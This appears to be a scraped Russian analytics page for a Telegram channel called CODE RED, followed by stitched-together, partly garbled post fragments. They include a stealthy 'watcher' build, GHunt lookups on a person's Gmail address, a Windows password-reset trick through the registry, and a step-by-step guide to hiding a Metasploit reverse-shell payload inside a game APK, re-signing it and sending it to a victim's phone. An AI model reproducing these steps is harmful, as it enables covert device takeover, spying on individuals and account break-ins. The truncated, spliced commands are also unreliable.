CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
Больше📈 Аналитический обзор Telegram-канала CODE RED
Канал CODE RED (@coderedcom) языкового сегмента Русский является активным участником. Сейчас сообщество объединяет 10 355 подписчиков, занимая 9 416 место в категории Технологии и приложения и 61 181 место в регионе Россия.
📊 Показатели аудитории и динамика
С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 10 355 подписчиков.
Согласно последним данным от 03 декабря, 2024, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 0, а за последние 24 часа — 0, при этом общий охват остаётся высоким.
- Статус верификации: Не верифицирован
- Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 0%. В первые 24 часа после публикации контент обычно набирает N/A% реакций от общего числа подписчиков.
- Охват публикаций: В среднем каждый пост получает 0 просмотров. В течение первых суток публикация набирает 0 просмотров.
- Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 0.
📝 Описание и контентная политика
Автор описывает ресурс как площадку для выражения субъективного мнения:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
Благодаря высокой частоте обновлений (последние данные получены 04 декабря, 2024) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.
pyinstaller -F --onefile --nocosole main.py
Чтобы перевести программу в режим ожидания, в котором она будет не активна, требуется зажать комбинацию клавиш «Alt + A». А если нужно вернуть активный режим, стоит нажать сочетание клавиш «Ctrl + Alt».
📌https://github.com/pro100git/watcher
#безопасностьpython -m pip install -r requirements.txt
Настройка
check_and_gen.py
python hunt.py почтаюзера@gmail.com
Этот проект использует Selenium и автоматически загружает правильный драйвер для вашей версии Chrome. Так что просто убедитесь, что у вас установлен Google Chrome.
📌https://github.com/mxrch/GHunt
#OSINT user
Просмотрев список пользователей, выбираем нужного и прописываем команду
user <имя выбранного пользователя> <новый пароль>
Если имя содержит пробелы, его нужно взять в кавычки.
Далее нужно откатить правки в реестре. Вписываем в консоль regedit и переходим к разделу HKEYLOCALMACHINE\System\Setup. Из параметра CmdLine удаляем значение, а в SetupType прописываем 0.
Готово! Теперь можно закрывать редактор и командную строку, перезагружать устройство и авторизовываться с помощью нового пароля.apt-get install -y zipalignЕщё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit. Сборка бекдора Запускаем в отдельном окне ngrok
tcp 4444Полученные lhost и lport используем для создания пейлоада
-p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apkНа выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд
d game.apk ◽️apktool d payload.apkТеперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем
{p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.
Компилируем отредактированный файл игры в apk
b gameГотовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000Получаем файл key.keystore. Теперь сертифицируем наш apk
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk coderedВыравниваем подписанное приложение командой
-v 4 game.apk game_good.apkГотово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
